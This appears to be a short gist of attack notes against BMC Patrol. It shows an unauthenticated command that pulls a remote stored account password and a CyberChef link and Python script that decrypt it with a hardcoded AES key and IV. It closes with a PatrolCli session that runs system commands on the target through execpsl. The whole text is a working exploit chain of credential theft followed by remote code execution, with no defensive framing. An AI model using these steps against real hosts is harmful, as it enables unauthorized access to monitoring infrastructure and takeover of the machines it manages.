patrol password encryption

gistfile1.md

Patrol unauthenticated get remote password

./pconfig +get -p <port> -host <host> | grep defaultAccount

Patrol decrypt password

https://gchq.github.io/CyberChef/#recipe=AES_Decrypt(%7B'option':'Hex','string':'0102030405060708414243444546474861626364656667689192939495969798'%7D,%7B'option':'Hex','string':'11213141516171810142639566470898'%7D,'CBC','Hex','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D)From_Base64('A-Za-z0-9%2B/%3D',true/disabled)To_Hex('Space',0/disabled)&input=RDIyMjZFOTRBMTg4NkY0MTc4NkFBQjk2MkQ0MUFBNTBGOUY1RUIwQ0EzQTJCMkYyMDFEQTMxNTJERDkxMTU2Ng

#!/usr/bin/env python3
from Cryptodome.Cipher import AES
import base64
import sys

unpad = lambda s : s[0:-ord(s[-1:])]

key = b'\x01\x02\x03\x04\x05\x06\x07\x08\x41\x42\x43\x44\x45\x46\x47\x48\x61\x62\x63\x64\x65\x66\x67\x68\x91\x92\x93\x94\x95\x96\x97\x98'
iv = b'\x11\x21\x31\x41\x51\x61\x71\x81\x01\x42\x63\x95\x66\x47\x08\x98'

ct = bytearray.fromhex(sys.argv[1])

cipher = AES.new(key, AES.MODE_CBC, iv)
pt = unpad(cipher.decrypt(ct))

print(pt)

Patrol code exec

./PatrolCli
PCli% user <user>
Password:
connect <hostname> <port>
execpsl "system(\"id\");"